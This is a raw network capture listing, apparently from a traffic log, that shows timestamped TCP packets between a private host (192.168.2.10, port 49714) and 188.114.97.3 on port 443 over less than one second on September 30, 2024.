Sep 30, 2024 18:20:14.926484108 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.926497936 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.993393898 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.993418932 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.993469000 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.993483067 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.993514061 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.993530035 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.994179964 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.994195938 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.994231939 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.994237900 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.994268894 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.994285107 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.010636091 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.010662079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.010721922 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.010735989 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.010773897 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.011085987 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.011104107 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.011151075 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.011157990 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.011235952 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.011562109 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.011579037 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.011616945 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.011622906 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.011658907 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.011934996 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.011949062 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.011991024 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.011996984 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.012020111 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.012028933 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.012517929 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.012537956 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.012579918 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.012586117 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.012609959 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.012625933 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.013232946 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.013250113 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.013304949 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.013312101 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.013364077 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.082173109 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.082197905 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.082315922 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.082333088 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.082392931 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.082787991 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.082804918 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.082860947 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.082866907 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.082918882 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.099307060 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.099330902 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.099390030 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.099404097 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.099425077 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.099445105 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.099831104 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.099848986 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.099908113 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.099915981 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.099936962 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.099956036 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.100136995 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.100151062 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.100179911 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.100192070 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.100219965 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.100244045 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.100548029 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.100563049 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.100608110 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.100614071 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.100641966 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.100661039 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.100851059 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.100866079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.100922108 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.100929022 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.101212978 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.101911068 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.101924896 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.101974010 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.101984978 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.102046013 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.171083927 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.171108007 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.171164036 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.171176910 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.171216011 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.171591043 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.171607971 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.171652079 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.171658039 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.171683073 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.171711922 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.187952995 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.187974930 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.188050985 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.188057899 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.188107014 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.188332081 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.188352108 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.188394070 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.188404083 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.188429117 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.188440084 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.189001083 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.189018965 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.189059019 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.189063072 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.189107895 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.189117908 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.189426899 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.189445019 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.189501047 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.189507961 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.189574003 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.189785004 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.189800978 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.189857960 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.189862967 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.190161943 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.190186024 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.190224886 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.190228939 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.190253019 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.190279961 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.259820938 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.259845972 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.259905100 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.259916067 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.259958029 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.259978056 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.260251999 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.260267973 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.260308981 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.260314941 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.260360003 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.260360003 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.276690006 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.276709080 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.276779890 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.276789904 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.277120113 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.277138948 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.277175903 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.277182102 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.277199030 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.277225971 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.277506113 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.277519941 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.277570963 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.277576923 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.277976990 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.277992964 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.278028965 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.278034925 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.278069019 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.278089046 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.278529882 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.278542995 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.278593063 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.278599024 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.278609991 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.278636932 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.278944016 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.278959036 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.278995991 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.279000998 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.279028893 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.279042006 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.348504066 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.348514080 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.348587036 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.348598003 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.348625898 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.348642111 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.348848104 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.348864079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.348912954 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.348927021 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.348948002 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.348963022 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.365269899 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.365298986 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.365603924 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.365629911 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.365629911 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.365638018 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.365654945 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.365689039 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.365886927 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.365901947 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.365951061 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.365957975 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.365982056 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.366456985 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.366473913 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.366539001 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.366545916 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.366931915 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.366944075 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.366986990 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.366993904 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.367016077 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.368546963 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.368572950 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.368608952 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.368613958 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.368640900 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.433073044 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.437299013 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.437323093 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.437366009 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.437375069 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.437401056 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.437530041 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.437549114 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.437581062 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.437587976 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.437624931 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.457665920 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.457688093 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.457727909 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.457736015 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.457748890 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.457767010 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.457768917 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.457809925 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.457815886 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.457847118 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.457918882 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.457932949 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.457967997 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.457973003 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458002090 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.458071947 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458090067 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458125114 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.458133936 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458146095 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.458216906 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458230019 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458267927 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.458275080 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458283901 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.458673954 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458693981 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458726883 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.458734035 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.458764076 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.526842117 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.526861906 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.526911020 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.526918888 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.526953936 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.527571917 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.527592897 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.527637005 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.527647972 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.527667046 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.545469046 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.545485020 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.545531988 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.545538902 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.545591116 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.546021938 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546037912 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546077967 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.546082973 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546118021 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.546502113 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546521902 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546556950 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.546561956 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546591997 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.546892881 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546905994 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546952009 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.546957016 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.546981096 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.547406912 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.547425985 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.547458887 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.547465086 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.547491074 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.547936916 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.547950029 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.548053026 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.548053026 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.548059940 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.615176916 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.615202904 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.615246058 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.615257025 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.615300894 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.633935928 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.633955002 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.634011984 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.634021044 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.634062052 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.634211063 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.634224892 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.634272099 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.634278059 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.634299994 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.634625912 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.634644985 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.634689093 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.634696007 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.634731054 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.635248899 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.635262012 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.635301113 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.635307074 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.635333061 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.635808945 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.635827065 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.635867119 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.635874033 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.635907888 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.636379004 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.636393070 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.636440039 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.636449099 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:15.636476994 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:15.636744976 CEST	443	49714	188.114.97.3	192.168.2.10
